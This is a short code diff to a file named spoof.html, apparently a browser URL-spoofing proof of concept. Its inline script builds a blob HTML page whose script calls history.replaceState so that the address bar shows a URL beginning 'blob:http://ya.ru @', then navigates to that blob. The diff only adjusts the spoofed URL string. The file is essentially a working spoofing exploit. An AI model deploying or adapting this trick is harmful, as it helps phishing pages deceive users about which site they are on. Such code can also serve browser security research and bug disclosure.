--- a/spoof.html
+++ b/spoof.html
@@ -15,7 +15,7 @@
     </script> -->
 
     <script>
-    var exp = 'Sergey (4) <script>history.replaceState("","","blob:http://ya.ru @http://' + location.host + '/")<\/script>';
+    var exp = 'Sergey (5) <script>history.replaceState("","","blob:http://ya.ru @' + location.host + '/")<\/script>';
     location=URL.createObjectURL(new Blob([exp], {type: "text/html"}))
     </script>
 </body>
